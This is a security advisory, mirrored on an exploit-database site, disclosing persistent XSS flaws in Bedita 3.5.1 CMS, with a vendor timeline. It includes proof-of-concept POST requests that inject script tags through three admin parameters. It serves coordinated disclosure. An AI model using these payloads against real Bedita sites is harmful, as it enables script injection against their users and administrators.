[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bedita 3.5.1 - XSS Vulnerabilities

Author
Sébastien Morin
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24182
Category
web applications
Date add
01-09-2015
Platform
php
########################################################################################
 
# Title: Bedita 3.5.1 XSS vulnerabilites 
# Application: Bedita
# Version: 3.5.1
# Software Link: http://www.bedita.com/
# Date: 2015-03-09
# Author: Sébastien Morin
# Contact: https://twitter.com/SebMorin1
# Category: Web Applications
 
########################################################################################
 
===================
Introduction:
===================
 
BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box.
BEdita is built upon the PHP development framework CakePHP.
 
(http://en.wikipedia.org/wiki/BEdita)
 
########################################################################################
 
===================
Report Timeline:
===================
 
2015-03-09 Vulnerabilities reported to vendor
2015-03-10 Vendor reponse
2015-03-11 Vendor confirmed
2015-08-31 Vendor releases version 3.6
2015-08-31 Advisory Release
 
 
########################################################################################
 
===================
Technical details:
===================
 
 
Persistent XSS:
===============
 
Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters.
This could allow malicious users to create a specially crafted POST request that would execute arbitrary
code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.
 
 
Exploits Examples:
 
 
1)cfg[projectName] parameter:
 
    POST http://127.0.0.1/bedita/index.php/admin/saveConfig 
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig
    Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
    Connection: keep-alive
 
    [...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...]
 
 
2) data[stats_provider_url] parameter:
 
    POST http://127.0.0.1/bedita/index.php/areas/saveArea
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/bedita/index.php/areas/saveArea
    Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
    Connection: keep-alive
 
    [...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...]
 
 
3) data[description] parameter:
 
    POST http://127.0.0.1/bedita/index.php/areas/saveSection
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/bedita/index.php/areas/saveSection
    Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
    Connection: keep-alive
 
    [...]data%5Bdescription%5D=</textarea><script>alert(123)</script>[...]
 
########################################################################################

#  0day.today [2024-12-25]  #